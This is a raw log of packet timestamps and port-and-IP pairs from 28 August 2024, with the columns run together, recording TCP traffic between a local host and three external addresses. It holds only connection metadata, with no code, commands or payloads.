                                                              Aug 28, 2024 14:00:51.070142031 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070151091 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070161104 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070171118 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070173025 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.070180893 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070193052 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070199966 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.070228100 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.070281982 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070292950 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070302010 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070311069 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070322037 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070328951 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.070346117 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.070348978 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070359945 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070369005 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070379972 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070389986 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.070390940 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070401907 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070415974 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.070437908 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.070565939 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070576906 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070585012 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070597887 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070607901 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070611000 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.070617914 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070627928 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.070628881 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.070648909 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.076679945 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.076693058 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.076703072 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.076736927 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.076740980 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.076751947 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.076761007 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.076771021 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.076786041 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.076805115 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.158700943 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.158827066 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.158895969 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159100056 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159111023 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159123898 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159145117 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159200907 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159212112 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159221888 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159230947 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159241915 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159270048 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159270048 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159369946 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159379959 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159389019 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159399033 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159410000 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159420013 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159424067 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159430027 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159440994 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159446955 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159454107 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159459114 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159470081 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159473896 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159481049 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159493923 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159504890 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159509897 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159513950 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159532070 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159557104 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159600019 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159610987 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159621000 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159631014 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159641027 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159647942 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159651041 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159657001 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159662008 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159688950 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159723043 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159734011 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159745932 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159756899 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159765959 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159774065 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159782887 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159841061 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159851074 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159859896 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159872055 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159883022 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159893036 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159894943 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.159905910 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159931898 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.159996986 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160007000 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160016060 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160026073 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160037994 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160043001 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160049915 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160054922 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160063028 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160089016 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160135031 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160145044 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160154104 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160166025 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160176039 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160181999 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160192013 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160202026 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160202980 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160212994 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160232067 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160260916 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160285950 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160295963 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160305023 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160314083 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160326958 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160327911 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160336018 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160362959 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160420895 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160432100 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160448074 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160458088 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160466909 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160469055 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160476923 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160490990 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160494089 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160505056 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160526991 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160532951 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160542965 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160547972 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160552979 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160567045 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160577059 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160604000 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160672903 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160682917 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160692930 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160703897 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160715103 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160717964 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160723925 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160737991 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160765886 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160785913 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160801888 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160811901 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160823107 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160834074 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160836935 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160845995 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160861969 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160877943 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160918951 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160928965 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160939932 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160950899 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160959959 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.160963058 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160974026 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.160990953 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.161061049 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.161071062 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.161112070 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.164510965 CEST8049176137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:51.251946926 CEST4917680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:51.310590982 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:00:51.316189051 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:00:51.317317009 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:00:51.328166962 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:00:51.333062887 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:00:52.016668081 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:00:52.184210062 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:00:52.184273005 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:00:52.189661980 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:00:52.194468021 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:00:52.195339918 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:00:52.200115919 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:00:52.200160980 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:00:52.205012083 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:00:53.363818884 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:00:53.365447998 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:00:53.370398998 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:00:53.542886019 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:00:53.546878099 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:00:53.551740885 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:00:53.551879883 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:00:53.555679083 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:00:53.560535908 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:00:53.626851082 CEST4917980192.168.2.22178.237.33.50
                                                              Aug 28, 2024 14:00:53.632083893 CEST8049179178.237.33.50192.168.2.22
                                                              Aug 28, 2024 14:00:53.632144928 CEST4917980192.168.2.22178.237.33.50
                                                              Aug 28, 2024 14:00:53.632468939 CEST4917980192.168.2.22178.237.33.50
                                                              Aug 28, 2024 14:00:53.637322903 CEST8049179178.237.33.50192.168.2.22
                                                              Aug 28, 2024 14:00:53.772311926 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:00:53.772382021 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:00:55.204083920 CEST8049179178.237.33.50192.168.2.22
                                                              Aug 28, 2024 14:00:55.204149008 CEST8049179178.237.33.50192.168.2.22
                                                              Aug 28, 2024 14:00:55.204396009 CEST4917980192.168.2.22178.237.33.50
                                                              Aug 28, 2024 14:00:55.204396963 CEST4917980192.168.2.22178.237.33.50
                                                              Aug 28, 2024 14:00:55.204572916 CEST8049179178.237.33.50192.168.2.22
                                                              Aug 28, 2024 14:00:55.204619884 CEST4917980192.168.2.22178.237.33.50
                                                              Aug 28, 2024 14:00:55.204727888 CEST8049179178.237.33.50192.168.2.22
                                                              Aug 28, 2024 14:00:55.204771042 CEST4917980192.168.2.22178.237.33.50
                                                              Aug 28, 2024 14:00:55.212018967 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:00:55.216841936 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:00:55.256223917 CEST8049179178.237.33.50192.168.2.22
                                                              Aug 28, 2024 14:00:55.256731987 CEST4917980192.168.2.22178.237.33.50
                                                              Aug 28, 2024 14:01:03.473890066 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.474148989 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.474225044 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:03.476547956 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.476623058 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:03.487169027 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:03.493159056 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.493272066 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:03.505667925 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.900594950 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.900610924 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.900615931 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.900620937 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.900630951 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.900635958 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.900643110 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.900654078 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.900686026 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:03.900722027 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:03.900991917 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.901029110 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.901038885 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.901067972 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:03.901071072 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.901123047 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:03.905606031 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.905627012 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:03.905670881 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.034845114 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.034868002 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.034877062 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.034882069 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.034887075 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.034895897 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.035006046 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.035265923 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.035275936 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.035286903 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.035310030 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.035334110 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.035343885 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.035352945 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.035371065 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.036349058 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.036359072 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.036369085 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.036377907 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.036387920 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.036390066 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.036401033 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.036412001 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.036425114 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.037229061 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.037237883 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.037247896 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.037259102 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.037271023 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.037292957 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.037549019 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.169493914 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.169506073 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.169517994 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.169568062 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.169579983 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.169581890 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.169589996 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.169614077 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.169665098 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.169675112 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.169686079 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.169698000 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.169703960 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.169729948 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.170502901 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.170514107 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.170526028 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.170536995 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.170562029 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.170577049 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.170882940 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.170896053 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.170907974 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.170924902 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.170943975 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.170960903 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.170969009 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.170980930 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.170990944 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.171004057 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.171014071 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.171041012 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.171713114 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.171731949 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.171741962 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.171775103 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.171822071 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.171833038 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.171843052 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.171853065 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.171864986 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.171869040 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.171892881 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.172058105 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.172667980 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.172688961 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.172700882 CEST82434917845.90.89.98192.168.2.22
